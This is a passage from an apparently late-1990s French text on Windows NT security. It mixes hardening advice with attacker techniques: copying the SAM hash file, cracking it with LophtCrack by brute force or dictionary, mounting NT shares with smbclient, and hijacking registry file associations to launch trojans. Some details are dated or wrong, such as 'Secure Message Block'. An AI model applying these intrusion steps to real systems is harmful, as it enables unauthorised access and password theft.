responsable.
Groupe des Administrateurs:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
C'est parce que les users avec les priviléges du groupe Administrators ont accés au
serveur entier que un hacker essayera d'abord d'avoir accés au serveur par un accompte
avec des priviléges d'administrateur.Si ces accomptes là sont suffisament sécurisés ,
alors les hackers essayent de pénétrer le systéme avec un accompte de plus bas niveau
et obtient par lui même des droits dans le groupe d'Administrateurs.c est ce que l'on
appelle une "Security step-up attack".
Le meilleur moyen de se défendre contre une attaque de ce genre est d'éliminer ou de
changer les doits du groupe Administratorsdans l'installation de Windows NT .Si vous
créez un nouveau groupe (ex: LAN-Admins) et que vous assignez tous les droits a ce
groupe, et eliminez ou reduisez les droits d'accés du groupe Administrators vous pourez
empecher une attaque de ce genre simplement parceque le hacker ne pourra pas identifier
a quel groupe il doit s'attaquer pour obtenir ces droits.
Passwords (localisation et enregistrement):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Chaque OS posséde une base de données des mots de passe, qu'il utilise pour vérifier
l'authentification du login de l'user.La base de donnée des mots de passes de Windows
NT est localisé dans le repertoire \winnt\system32\config\sam du serveur. La base de
donnée des passwords n'est ni enregistrée sous forme de passwords, ni sous forme de
passwords encryptés. Windows NT enregistre la base de donnée des passwords sous forme
d'une valeur minimisée "hash" pour chaque password. Cette fonction réduit le password
a une unique valeur. Dans Windows NT, l'OS converti le texte du password de l'user en
un Unicode (série de bytes) et ensuite utilise l'algorythme MD4 (Message Digest-4) pour
convertir les passwords en une valeur "hash":
+------------------+
User: Jame | |
Password: Bond ----->| HASH |----> 2451938
| |
+------------------+
Lorsqu'un user essaye de se loguer sur le serveur, la Workstation Windows NT reproduit
le même processus que l'OS lorsqu'elle enregistre les passwords dans sa base de donnée,
la Workstation converti le password par le MD4 pour obtenir la valeur "hash".Ensuite la
Workstation envoie cette valeur "hash" au serveur, qui compare cette valeur avec la valeur
enregistrée dans la base de donnée des passwords du serveur.Si les deux valeurs correspondent
le serveur logue l'user sur le sytème.
La façon dont Windows NT gére les passwords évite que la base de donnée sur le serveur ne
soit pas seulement du texte encrypté comme sur les serveurs Unix dans le /etc/password
(encryption DES).
Comment "Hacker" des Passwords:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Pour (re)trouver les passwords de votre réseau Windows NT , un hacker doit avoir accés
a un login et a l'implémentation NT MD4. Aprés que le hacker ai copié la base de donnée
des passwords (seul endroit ou trouver des logins et les MD4 hash), l'intruder pourras
alors tenter un brute force ou une attaque au dictionnaire contre le fichier password.
Brute force Attaque:
-=-=-=-=-=-=-=-=-=-=-
Lorsqu'un hacker attaque une installation sous Windows NT sa premiere démarche est
généralement d'essayer de gagner un accés par un accompte avec un password de faible
niveau. Si vous n'avez pas lancé le "Lockout Account", le hacker peut essayer des passwords
jusqu'a ce que le réseaux les accéptent.Un hacker peut automatiser ce processus a l'aide
d'un programme,cette technique est connue sous le nom de "Brute force passsword-cracking
technique".Un programme qui réalise une brute force attaque essaye des passwords comme
aa, ab ,ac ...et jusqu'a ce qu'il trouve une combinaison de caractéres acceptée.
Une brute force attaque contre un serveur NT veut dire que le hacker a accés a une console,
ou a une copie de la base de donnée des passwords.Dans le cas ou le hacker lance une brute
force attaque contre une base de donnée des passwords de NT, de nombreux logiciels
(passwords-cracker), peuvent casser un password de 16 caractéres en une semaine.
La meilleure défense contre une brute force attaque est de sécuriser le serveur de telle
façon a ce que la base de donnée des passwords ne soit pas accéssible aux personnes
exterieures.
Attaque par Dictionnaire:
-=-=-=-=-=-=-=-=-=-=-=-=-
Les attaques au dictionnaire fonctionnent de deux façons différentes: contre la base de
donnée des passwords (off-line) et contre le serveur au prompt du login (si vous n'avez
pas lancé le Lockout Account).Son fonctionnement est simple, une liste de mots est encryptée
par le même algorythme qu'utilise Windows NT pour comparer cette encryption avec la valeur
"hash" (si le hacker a une copie off-line de la base de donnée des passwords ).
La meilleure protection contre une attaque au dictionnaire est de forcer les users a
changer leur mots de passe et d'utiliser des programmes de passwords checking qui testent
la faiblesse des mots de passe, sensibiliser les users pour qu'ils utilisent des passwords
plus fiables (huit lettres minimum, de préférence avec des chiffres,des lettres et des
symboles ).
Utilisation de LophtCrack:
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Ce cracker, fait parti des meilleurs reservé à Windows NT. Il fonctionne sous Windows NT,
et vous propose toutes les fonctions courantes des crackers, dicos, brute force,Pause/Restore.
Par contre son utlisation est limité à 15 Jours. Les derniéres versions contiennent un
Dumper et un sniffer. Pour le downloader, www.l0pht.com .
Un "plug-in" est disponible pour aller un peu plus vite que la version basique, appellé
smbgrinder.
LockOut Sécurité:
-=-=-=-=-=-=-=-=-
Si vous n'activez pas le LockOut Account, par défaut il n'y aura pas de blocage du systeme
de log-in au bout d'un certain nombre d'essais, ce qui permet a un hacker de faire des brutes
forces attaques sur n'importe quel accompte sans restrictions.
Vous devez donc pour eviter cela activer le "LockOut Account" qui bloque le systéme
au bout d'un nombre limité de tentatives, Microsoft recommande d'activer le Lockout
Account aprés cinq essais incorrects.
Accompte Administrateur sans Password:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
L'accompte Administrator est le plus privilégié des accomptes NT, Un accompte Administrator
sans password pose un risque majeur pour la sécurité de votre réseaux.Certains serveurs
pré-installés, n'ont pas de passwords sur l'accompte administrateur, modifiez cette
omission au plus vite.
Accompte Administrateur:
-=-=-=-=-=-=-=-=-=-=-=-=-
Par défaut, Windows NT ne peut activer le "LockOut Account" pour l'Administrateur.
C'est ce qui fait que l'accompte Administrator est plus vulnérable a une attaque au
dictionnaire on line.Pour corriger la vulnérabilité de l'accompte Administrateur, il
y a trois étapes à suivre:
1- Renomer l'accompte Administrator en autre chose que le hacker ne pourrais deviner
aisément.
2- Ajouter un nouvel User nommé "Administrator" au goupe "Guest" en plus de renommer
accompte Administrator.Donner au nouvel user "Administrator" un password trés long qu'il
sera difficile au hacker de trouver.Ensuite désactivez le LockOut Account pour cet user,
et monitorez tous les essais de login sur cet accompte.
3- Effacez les droits de l'accompte "Administrator" pour se loguer au réseau, en d'autres
mots, forcez l'"Administrator" à se loguer sur le réseau par la console.Si vous faites
cela vous forcez alors une brute force attaque a venir de la console, de plus seuls
les users avec un LockOut Account automatique peuvent se loguer a partir du réseau sur
la console.
Accompte Guest sans Password:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bien que Windows NT 4.0 ai l'accompte "Guest" non activé par défaut,les versions 3.5 et
3.51 incluent un accompte "Guest" global.Si vous n'avez pas désactivé cet accompte
"Guest" et qu'il n'ai pas de passwords, un hacker peut peut se loguer dans le serveur
avec n'importe quel login et password.Si vous n'avez pas restreind l'accés a certains
fichiers ainsi qu'aux registres NT, l'intru peut alors acceder à des zones sensibles.
En clair, la meilleure solution a ce probléme est de désactiver l'accompte "Guest".
TCP/IP et HTTP:
-=-=-=-=-=-=-=-
Les machines NT (surtout les gateways ) ne supportent habituellement pas les commandes
de systémes Unix comme NFS (Network File System), NIS (Network Information System),
Sun RPC,et les commandes r d'Unix (rlogin...), il est plus facile de boucher des
trous dans les défenses TCP/IP de Windows NT que dans un environnement Unix.
Deplus les users distants (remote) auront accés au serveur NT par le RAS
(Remote Access Service), plutot que par Telnet, ce qui vous permet un plus grand controle
sur les remotes users.Le RAS fournit des services de sécurité pour se protéger contre des
options de la ligne de commande des remotes users.
Le risque le plus grand d'attaques contre un serveur NT venant de l'internet sont les attaques
par le SMTP (Simple Mail Transport Protocol) et par les services HTTP (HyperText Transport
Protocol).Lorsque votre systéme boote, assurez vouz que vos services SMTP et HTTP aient des
permissions d'accés limités (au niveau users) qui limitent l'accés aux objets ou
repertoiresauxquel le service a besoin d'accéder.Par exemple,votre service HTTP devrais
avoir un accés en lecture seule sur repertoire qui contient vos fichiers internet, a moins
qu'un Script CGI génere une page spécifique une fois lancé, dans ce cas, le service devrais
avoir un accés en lecture-écriture sur cette page web seulement.en aucun cas, vos services
SMTP et HTTP ne doivent avoir des accés complets sur le disque dur du serveur.
HTTp est un protocole relativement simple, limité a un petit nombre de commandes établies.
Malheureusement (ou heureusement pour d'autres =] !! )dans son implémentation initiale le
service du serveur web NT (Internet-Information Server, ou IIS), qui lance HTTP sur l'OS
Windows NT, a quelques trous de sécurités majeursqui permettent a un hacker d'utiliser des
commandes pour pénétrer le systéme.par exemple, un des trous de sécurité permet a n'importe
qui avec un accés distant (remote access) a un IIS Web-Server (c'est à dire n'importe
qui sur internet, si le serveur est connecté à internet) d'effacer des fichiers pour lesquels
le serveur a des permissions de suppréssion, sans loguer les accés (a moins que
l'administrateur active le "base-object Auditing").
Pour corriger le probléme dans l'IIS, assurez vous que vous ayez installer la version
la plus récente d'IIS sur votre serveur Web NT.
Protocoles de Sécurité:
-=-=-=-=-=-=-=-=-=-=-=-
Les différents protocoles de sécurité peuvent utiliser différentes APIs (Application
Programming Interfaces), qui peuvent créer des problémes pour les applications qui
devraient utiliser plus d'une API.La solution de Microsoftace probleme de sécurité de
protocoles, pour Windows 9x et Windows NT est le SSPI (Security Service Provider Interface).
Le SSPI n'est pas une version complétement compatible du IETF (Internet Engineering Task
Force), standard du service de sécurité de l'API (Generic Standard Security API). Comme
celui ci le SSPI procure une façon d'accéder aux services de sécurité distribués pour quel
que soit ce service.Le SSPI est fonctionnel sous Windows NT, alors que le IETF fonctionne
sous d'autres OS.
Les SSP (Security Service Providers) sont des composants, qui viennent implémenter le
le SSPI dans Windows NT 4.0, Microsoft a inclu ces SSP pour le NT LAN Manager et
SSL/Private Communications Technologies.Microsoft a commencéa inclure un SSP de
Kerebos et une version updatée du provider de SSL/Private Communication Technology dans
Windows NT 5.0 .
Les protocoles communiquent avec les SSP,qui communiquent avec la SSPI,qui ensuite
communique avec les APIs sous jacentes pour implementer la requette du protocole.
HTTP, le protocole CIFS (Common Internet Files System) que le DFS ( Distributed File
System) utilise, et le protocole Microsoft Remote Procedure Call (RPC for Windows),utilisent
tous le SSPI pour communiquer avec Windows NT.Chacun de ces protocoles peuvent utiliser
n'importe quel SSP, laissant à chacun le soin de faire le choix approprié.En clair , en
séparant les services de sécurité distribués de leur providers,l'architecture des providers
de sécurité de Microsoft supporte de nombreuses options sans créer trop de complexité.
Services SMB (Secure Message Block):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Windows NT utilise le protocole SMB ( Secure Message Block ) pour controler le réseau et
les accés a distances aux services du serveur.Le protocole SMB est important car il permet
aux users d'avoir accés aux fichiers partagés, au registre et aux autres services du systeme
distant.Les users communicant avec le serveur utilisant le protocole SMB peuvent avoir
accés a n'importe quel service comme un user communicant avec un serveur utilisant NetBIOS
(rotocole utilisé par Windows NT ).Il est possible d'établir les permissions SMB sur des
fichiers, registres et imprimantes.
Windows NT controle les accés avec les logins et password ( note: l'accompte Guest n as
pas de passwords ).Dans les workstation NT 3.51, NT active l'accompte Guest par défaut.
Dans NT 4.0 et NT 5, NT désactive l'accompte Guest sur les workstations ainsi que sur le
serveur par défaut.Gardez l'accompte Guest désactivés sur des machines que vous exposez a
l'internet ou a un autre environement non protégé.
Même si tous les accomptes ont des passwords, un hacker peut encore essayer des logins
et passwords en utilisant une brute force ou une attaque au dictinnaire. our se défendre
contre ce type d'attaque vous devrez utiler des passwords avec au minimun huit caractéres,
ainsi que un mélange de lettres/symboles/chiffres.Vous pouvez aussi établir un nombre de
login erroné aprés lequel le systéme bloque l'accompte ciblé pour une certaine periode.
Vous ne devrez pas etablir de limite pour les login érronés de l'accompte Administrateur
pour éviter les attaques DOS (Denial Of Services) (en effet des logins érronés répétés
désactivent tous les accomptes sur la machine).Bienque vous puissiez renomer l'accompte
Administrateur en quelque chose d'autre et établir un password difficile a cracker vous
devriez aussi désactiver le login de l'accompte Administrateur par le réseaux ce qui signifie
que pour forcer l'accompte Administrateur le hacker doit avoir accés physiquement au serveur.
La meilleure façon de d'interdire les attaques basées sur le SMB contre votre réseau est de
désactiver l'accés au services SMB par l'internet.Si vous avez un routeur , vous pouvez
désactiverles ports UDP/TCP 137, 138, 139, qui désactivent les connections NetBIOS aux ports
TCP/IP de Windows NT.
SAMBA:
-=-=-=-
Samba est une application Freeware de Andy Tridgell dévellopée pour aider les Administrateurs
réseaux a integrer les serveurs Un*x dans un réseau Microsoft Windows NT .L'idée principale
derriere Samba est de laisser des machines Un*x accéder aux fichiers NT.
Samba peut directement accéder aux données Windows NT d'une machine Un*x .Samba est
important de deux point de vue:
1- Il aide a intégrer des machines Un*x sur un environement NT .
2- Samba permet aux hackers d'acceder au serveur NT grace a une machine Linux a tarvers
les port UDP/TCP comme un Trusted Host ( machines considérés comme sures et n'ayant pas
a s'authentifier par un password )
Utilisation de SAMBA vers NT
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
L'utilisation de samba contre NT repose sur 2 commandes importantes. A savoir, smbclient
et smbmount. Avec ces commandes commandes, toute station linux est capable de monter des
partitions NT distantes. Pour savoir connaitre tous les paramétres reférer vous au man ...
Utilisation typique de samba:
smbclient \\\\box_name\\f username password
Server time is Frid Mar 29 15:48:03 1999
Timezone is CST - 1
smb: \>dir
WINDOWS D 10:58 09/03/99
RECYCLED DR 10:58 09/03/99
51141 blocks of size 512. 9641 blocks available
smb: \>
Vous pouvez toujours utilisez le client smb de ADM, ADM-CLIENT-smb disponible en
FTP sur adm.isp.at .
Vulnérabilités NT:
-=-=-=-=-=-=-=-=-=-
La premiere vulnérabilité de Windows NT viens des services que NT fait tourner.
Les Services sont des progammes que NT lance sur le serveur, générallement en fond
de tache, et qui permettent a NT de reconnaitre les différents protocoles, de régir les
serveurs d'impression.
Services d'Alerte NT:
-=-=-=-=-=-=-=-=-=-=-
Windows NT posséde un service d'alerte ( Windows NT Alerter and Messenger services ) qui permet
a un user d'envoyer des messages "pop-up" aux autres users du même domaine ou d'un domaine
considéré comme sûr ( trusted host).Le premier risque de ces services est une attaque de type
social engineering pour convaincre un user de lui céder son password.
Ces services requierent seulement un niveau d'accés Guest sur le réseau Windows NT, vous
devrez donc désactiver ces services pour plus de sécurité d'autant plus qu'ils ne sont pas
indispensables.De plus ces services forcent le réseaux a diffuser les usernames courants
dans la table du NetBIOS, ce qui permet d'effectuer une attaque Brute Force sur un username
valide.
Pour désactiver ces services , selectionnez le menu démarrer, panneau de controle des
options du groupe programme.Dans ce panneau de controle double clickez sur l'icone Alert
and Messenger Services.Windows NT affiche alors une dialog box .Clickez sur la check box
Disable pour désactiver ces services.
NetBIOS:
-=-=-=-=-
Lorsque vous installez Windows NT 4.0, NT crée une NetBIOS share ( partage de fichier,
repertoire, ressources ).Ce partage de fichier laisse n'importe qui avec une permission
d'accés machine avoir un accés total a la NetBIOS share.Il est commun de trouverdes
fichiers partagés (shares) avec tous les accés établis, car NT par défaut établis les
shares avec un accés total.Sous certaine version de NT , un hacker peut utiliser des shares
pour faire crasher la machine.Vous devez donc éliminer les shares de votre systeme ou bien
établir des permissions explicites pour ces shares , pour corriger ces permissions exessives.
Sécurité LAN Manager:
-=-=-=-=-=-=-=-=-=-=-=-
Le Windows NT LAN Manager est un service qui tourne sous Windows NT et qui permet aux
Clients NetBIOS non NT de se connecter a un seveur Windows NT.Les réseaux Windows NT
utilisent pour la plupart le LAN Manager pour connecter des machines tournant sous une
OS compatible au serveur NT (Windows 3.11 etc...)
Une machine sous Windows NT utilisant l'authentification par le LAN Manager est moins
sécurisée qu'une machine avec un authentification de NT a NT.Cela est du au fait que la
sécurité du LAN Manager est moins perfomante que celle de NT a NT et aussi par le fait que
certaines version du LAN Manager peuvent créer d'autres trous de sécurité dans votre réseau.
Mieux vaut utiliser une Workstation NT coté client et un serveur NT coté serveur.
NTNM (NT Network Monitor):
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Le service Network Manager de Windows NT permet a n'inmporte quelle machine tournant
sous NT de se comporter comme un sniffer (qui récupere toutes les informations transitant
sur le réseau ).Une connection au NTNM requiert un niveau d'accés administrateur et le
programme nécessaire que Microsoft ne distribu qu'avec la licence de Windows NT Server 4.0
L'agent du NTNM requiert un password de l'utilisateur avant de pouvoir etre utiliser.
Une des faiblesse de Windows NT est qu'il encrypte ce password avec une méthode trés
superficielle dans une dll (data-link library).N'importe qui avec un accés en lecture sur
la bhsupp.dll peut obtenir le password avec un minimum d'effort.Vous ne devez lancer l'agent
NTNM que quand cela est absolument nécessaire car il peut étre sujet a des attaques.
Désactivez votre NT Network Monitor ( à l'interieur du panneau de controle ) et effacez la
bhsupp.dll.Lorsque vous devez utiliser le NTNM utilisez un password unique ou pas de password
du tout et ensuite éffacez a nouveau la bhsupp.dll.
Service RSH:
-=-=-=-=-=-=-
Micorosoft possede une version de la commande Un*x rsh ( remote shell program ) avec le
Kit de ressources de Windows NT qui exécute toutes les commandes sous un accompte systéme,
indépendament de quel utilisateur lance la commande.La commande rsh permet a un utilisateur
local d'exécuter un programme sur une remote host.L'accompte systéme est l'accompte le
plus puissant sur une machine NT.Un utilisateur connecté sur votre serveur par cette méthode
peut exécuter n'importe quelle commande sur le serveur , comme un utilisateur systéme.
Le service rsh est donc dangereux a utiliser et vous devriez ne jamais le lancer sans savoir
ce que vous faite a 200%.Si vous vérifiez votre serveur et que vous vous appercevez que
le service rsh est lancé, vous pouvez l'effacer en utilisant l'outil instsrv, qui se trouve
aussi dans le kit de resources de Windows NT.Pour désactiver le service rsh,entrez la commande
suivante sous la console ( comme la commande MS-DOS ) :
c:\>instrsv rshsvc remove <ENTER>
Service SCHEDULE:
-=-=-=-=-=-=-=-=-
Le service SCHEDULE permet aux administrateurs de "programmer" l'exécution de certaines
taches a un moment précis. Habituellement le service SCHEDULE exécute les taches sous
l'accompte systéme, il peut donc modifier les priviléges des accomptes, ceci signifie qu'un
hacker qui modifie la configuation de l'accompte SCHEDULE pour lancer un Trojan peut utiliser
le service SCHEDULE pour modifier les permissions sur le réseau.Windwos NT désactive le
service SCHEDULE quand vous configurez votre systéme comme une machine sécurisé de
classe C2.
Il y a deux façon de réduire les risques de l'utilisation de ce service :
1- Vous pouvez reconfigurer le service avec un accés de faible niveau lorsqu'il
exécute les commandes.
2- Vous pouvez désactiver le service.Pour cela allez dans le menu démarrer puis
panneau de controle du groupe programmes, double clickez sur l'icone SCHEDULE Service.
Registre NT:
-=-=-=-=-=-=-
L'OS 32-bit de Windows enregistre la plupart des informations spécifique au systéme à
l'interieur de la base de registre de Windows.Les seules personnes qui ont normalement
accés a la base de registre devrais étre les Administrateurs et les Super users. Techniquement
les utilisateurs qui doivent installer des programmes ou qui doivent surveiller les audits ou
les autres informations systémes devraient avoir accés a la base de registre de Windows NT.
Si des Users ont des droits d'accés, ou si l'accompte Guest a des priviléges, des
utilisateurs non-authaurisés et des hackers peuvent éditer la base de registre de Windows.
Un utilisateur avec le privilége d'éditer la base de registre de Windows NT peut
fondamentallement changer le setup de l'installation du serveur Windows NT.
Aprés qu' un intruder est ouvert la base de registre de Windows NT, il peut facilement
lire la liste des controles d'accés depuis les clé de registres:
HKEY_LOCAL_MACHINE et HKEY_CLASSES_ROOT.
Si le hacker a des droits pour éditer a l'interieur de la base de registre NT, il peut
changer chaque entrée (programmes, fichiers associés ...) avec une permission en ecriture
pour lui, il peut alterer les fichiers associés tel que un .txt ne lance plus notepad.exe
mais un Trojan ou un autre programme pour modfier ou faire rebooter le systéme.
De plus si votre accompte Guest a un accés en ecriture sur la base de registre soit
votre Windows NT est trés mal configuré soit un intru est déja passé par la.Vous devez
revoir les permissions pour la base de registre assez souvent.Sous Windows NT 4.0 vous
pouvez empécher l'accés a la base de registre par le réseau en ne laissant que les users
ayant physiquement accés a la console editer la base de registre.
Système NT et Virus :
-=-=-=-=-=-=-=-=-=-=-
Seuls des virus écrits dans des langages de haut niveau affectent Windows NT contrairement
aux virus écrits en langage de bas niveau comme l'assembleur(jusqu'a preuve du contraire :] )
c'est à dire les virus Java, Scripts MS-Words, Maccro d'Exel ... peuvent attaquer votre
systéme NT. Les autres types de virus peuvent affecter Windows NT seulement si vous possédez
un multi boot (Linux, OS/2, Unix, Windows 3x, Windows 9x avec Windows NT).Si vous avez
un virus qui detruit le secteur de boot, le virus pourra aussi détruire votre partition
Windows NT.
Pour quelques exemples, http://www.icubed.com/virus/ntvirus.html ...
Comme généralement le système Windows NT sert de serveur de fichier dans un réseau,
constitué d'autres systèmes comme MS-DOS ou Windows 3x-9x, il existe des anti-virus
basés sur NT pour prévenir contre ce genre d'attaque.
Sécurité des Serveurs FTP :
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Dans l'installation de votre réseaux Windows NT, vous connecterez généralement au moins une
machine à l'internet. Si vous avez un service FTP à l'interieur de votre domaine, vous
connaissez les problémes du serveur FTP de Windows NT. L' IIS ( Internet Information Server )
FTP est plus securisé que le serveur FTP standard de Windows NT.
Une des plus grande faiblesse du serveur FTP de NT est qu'il ne loggue pas les accés au réseau
par défaut. Pour qu'il loggue les accés vous devrez modifier le numéro d'un paramétre dans la
clé de registre suivante:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FtpSvc\Parameters
Pour activer la fonction de log du FTP vous devrez mettre les paramétres LogAnonymous,
LogFileAcces et LogNonAnonymous à 1.Pour savoir comment éditer les clés de la base de
registre référez vous au paragraphe Logs . POur désactiver les logs, mettez ces valeurs
à 0.
Utilitaire Rollback.exe:
-=-=-=-=-=-=-=-=-=-=-=-=-
Le CD-ROM de NT 4.0 contient un utilitaire appelé Rollback.exe, qui peut comprométre votre
systéme si vous le lancez.Si vous le lancez ce programme va effacer toutes les entrées
du Registre du systéme.Microsoft à désigné roolback.exe comme un utilitaire pour aider les
administrateurs à "nettoyer" les entrées du Registre de la base de registre.Vouz devez donc
effacer ce programme de votre serveur ou si vous voulez le garder le renommer pour eviter
une attaque D.o.S ( Denial of Service ) au rollback.exe.
Securité du service RAS ( Remote Access Services):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Un des service les plus utilisé sur les serveurs Windows NT est le RAS de Microsoft, c'est
un service qui gére les logins des remotes users sur un réseau Windows NT, incluant les
logins provenant d'internet et téléphoniques.Le RAS travaille en paralléle du LSA ( Local
Security Authority ), du SAM ( Security Account Manager ) et du SRM ( Security Reference
Monitor ) pour permettre aux users de se logguer sur le réseaux par un endroit non
physiquement connecté au réseau.
Les utilisateurs se connectent au serveur avec RAS puis sont ensuite sur le réseau.
Le RAS commence comme une connection normale sur un réseau.L'ordinateur de l'utilisateur
( remote ) passe le password du login a travers le MD-4 et l'envoie, en même temps que
l'username ( login ), au serveur Windows NT qui vérifie la valeur du password passé au MD-4
avec sa propre base de donnée des mot des passe.Bienque par défaut, le RAS encrypte seulement
le password les ordinateurs envoient générallement les transmissions régulieres" en clair ".
Ce qui signifie que le RAS peut ouvrir des possibilités de hack à travers un simple serveur
Web ou FTP.Un utilisateur avec un des droits d'accés du style "trusted host" peut lire et
ecrire des fichiers de la machine qui fait tourner RAS, ce qui implique qu'il y ai des
informations sur la machine RAS que le hacker peut utiliser pour ensuite faire du Social
Engeniring ou hacker la machine.Si la machine RAS fait partie d'un domaine étendu ( ce qui
est généralement le cas ), alors le hacker peut tirer des informations ( protégées ou non )
du réseau.
Il y a plusieurs maniéres différentes pour sécuriser votre serveur RAS et les connections en
remote au RAS.
1- Protégez le server a l'interieur d'un sous-réseau de firewall (Screening Router).
Placez un routeur qui bloque les accés entre le serveur RAS et les ordinateurs a l'interieur
du firewall d'un coté du sous-réseau.Placez un routeur qui bloque certaines activités
(par exemple l'accés FTP ou certaines IP ) de l'autre coté du sous-réseau.
2- Activez l' "Auditing" pour le RAS.Pour activez cette fonction pour le RAS, selectionnez
dans le menu démarrer : Programs option Administrative Tools program group.A l'interieur
selectionnez : User Manager for domains program, ensuite selectionnez les options pour activer
les services d'audit de Windows NT.Aprés cela vous aurez besoin de modifier le registre de
Windows pour activer cette fonction pour le RAS.Pour cela lancez regedit et mettez la valeur
de clé suivante à1.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\logging
Vous devez ensuite arréter le RAS et rebooter le serveur.
3- Dans le RAS, activez l'authentification RAS.L'authentification des packets RAS informe
l'user de signer digitallement chaque packet que le remote user transmet au serveur.
Obliger les users à signer les packets vouz protége contre des packets spoofés d'un hacker.
Car une modification d'un packet par un hacker détériore la signature digitale.
4- Dans le RAS, activez la session d'encryption.Si vous activez la session d'encryption,
le serveur RAS enverra une clé de session au remote user aprés le login de l'user.Alors que
le RAS une encypytion symétrique pour la clé de session, le serveur RAS génére une nouvelle
clé de session pour chaque login d'user ce qui procure une sécurité contre une réutilisation
de clé par un intruder.
Le plus sérieux probléme avec l'encryption RAS de Windows NT 3.51 et NT 4.0 est que
le serveur transmet la clé de session " en clair ", ce qui signifie qu' un hacker peut
utiliser la clé de session pour "interférer" dans les transmissions d'une session courante
d'un user.Windows NT 5.0 (ou Windows 2000 ) pourra contrer ce probléme grâce a l'implémentation
Kerberos.Kerberos procure une sécurité assez signifiante pendant les transactions même pour
les systémes d'accés distant.
5- Dans le RAS, activez les fonctions dial-back.Lorsqu'un user se loggue dans le serveur
RAS avec le dial-back activé, le seveur vérifiera le login de l'user , et ensuite démarrera
la connection.Le serveur RAS compose alors un numéro préprogrammé pour l'user et et re-connecte
la machine de l'utilisateur distant.Les connections par dial-backsont extrémement sécurisés,
du fait que le dial-back vérifie la localisation de l'utilisateur comme identification.
Si vous avez des groupes d'accés que la machine ne peut reconnecter en utilisant les fonctions
dial-back, (connection d'un hotel ou d'un cyber... ) vous pouvez laisser ces users se
connecter au RAS en utilisant un accompte qui ne rappelle pas un numéro pré-programmé.
6- Dans le RAS, créez des limitations qui spécifient durant quelles heures le serveur RAS
laisse les utilisateurs distants se connecter .
Si vous respectez ces quelques régles votre serveur RAS sera plus sécurisé qu'une simple
instalation du serveur RAS.
Logs et Audits:
-=-=-=-=-=-=-=-
Par défaut Windows NT désactive les audits durant le procéssus d'installation.Windwos NT
comprend différent programmes et systémes pour loguer ( comme le programme Event Viewer)
Le systéme Windows NT requiert une instruction spécifique de l'administrateur systéme pour
activer le log des audits.L'Event Viewer de Windows NT procure aussi des informations
importantes sur l'installation et le démarrage des services.
Le programme Event Viewer.
Activation du systéme de log:
Avant de pouvoir monitorer les activités sur votre réseau Windows NT, vous devez activer
le service de log de NT.Pour l'activer, suivez les étapes suivantes:
1- Loguez vous en tant qu'administrateur.
2- Clickez sur le bouton start, sélectionnez l'option des programmes, et choisissez le
groupe Administrative Tool program.A l'interieur de ce groupe , selectionnez le programme
User Manager for Domain.Windows NT lancera ce programme.
* Le programme User Manager
3- Dans le programme User Manager , selectionnez le menu Audit option.
Windows NT affichera alors une boite de dialogue.
boite de dialogue du menu des options d'Audit.
4- Dans cette boite de dialogue, selectionnez le bouton Audit These Event.
Windows NT activera la liste des options d'audit.
5- Dans ce menu clickez sur les checkbox dans chaque colones pour activer les options
que vous voulez que NT logue.
_______________________________________________________________________
>Log on/Log off: Permet à l'Event Viewer de maintenir l'enregistrement des logins locaux
et distants.
>File and Object Access: Permet à l'Event Viewer de maintenir l'enregistrement de
tous les accés fichiers, repertoires et imprimante. Ces fichiers et repertoires doivent
étre sur la partition NTFS pour activer le log.aprés avoir activé cette option, utilisez
Windows NT Explorer pour selectionner les audits pour des fichiers et repertoires
individuels.
>Users and Group Management: Permet à l'Event Viewer de maintenir l'enregistrement des
accomptes ou groupes d'users que l'administrateur systéme ou d'autres users authorisés
créent, changent, ou éffacent. Cette option permet aussi le log du changement de password
que les users changent ou établissent.
>Security Policy Changes: Permet à l'Event Viewer de maintenir l'enregistrement de n'importe
quel changement des droits des users et des options d'audit.
>Restart, Shutdown, and System: Permet à l'Event Viewer de maintenir l'enregistrement
de l'arret, rebootage et redémarrage du systéme et des workstations locales.
>Process Tracking: Permet à l'Event Viewer de maintenir l'enregistrement de l'activation
des programmes et des duplications, des accés d'objets indirects et des processus de
sortie.
_______________________________________________________________________
6- Dans la boite de dialogue clickez ensuite sur le bouton OK.Windows NT retournera à
l'User Manager.
7- Pour fermer l'User Manager selectionnez l'option Exit.Windows NT retournera au bureau.
* Audits de la Base d'Objets avec NT:
Le systéme d'audit décrit précédement est un pas vers plus de sécurité mais reste imparfait,
pour activer l'audition pour d'autres options non inclues dans la boite de dialogue des
options de l'User Managervous devrez modifier des entrées dans le systéme de Registre.
Le systéme de registre de Windows NT enregistre les informations sur les programmes installés
sur la machine, les options de l'OS et beaucoup d'autres informations.Vous pouvez ajouter
des auditions pour votre serveur en utilisant l'éditeur de registre regedit pour ajouter des
informations au systéme de registre.Pour lancer le programme regedit suivez les étapes
suivantes:
1- selectionnez dans le menu démarrer l'option Run.Windows NT affiche la boite de dialogue du
menu Run.
2- Tapez c:\winnt\regedit
3- clickez sur OK pour afficher l'editeur de registre.
* Editeur de registre:
Dans les sections suivantes vous utiliserai l'éditeur de registre pour ajouter des informations
supplémentaire pour le systéme d'audits a la base de registre du systéme.
Ces informations additionnelles sur l'audition permettra à Windows NT de surveiller la base
d'objets, les priviléges, et les arréts quand les logs d'audits sont pleins.
* Audits de la base d'Objets:
Bienque Windows NT vous permette des audits sur des fichiers et objets individuels dans
la partition NTFS, NT ne supporte pas directement les audits des services et objets basiques
du systéme, souvent appelés base systeme objects.Pour activer les audits sur ces objets vous
devrez utiliser regedit pour ajouter la valeur de clé de registre suivante dans la base de
registre des clés:
HKEY_LOCAL_MACHINE_\System\CurrentControlSet\Control\Lsa:
Name : AuditBaseObjects
Type : REG_DWORD
Value: 1
Pour ajouter cette clé de registre a la base de registre suivez les étapes suivantes:
1- Dans l'editeur de registre , double clickez sur le repertoire
HKEY_LOCAL_MACHINE.
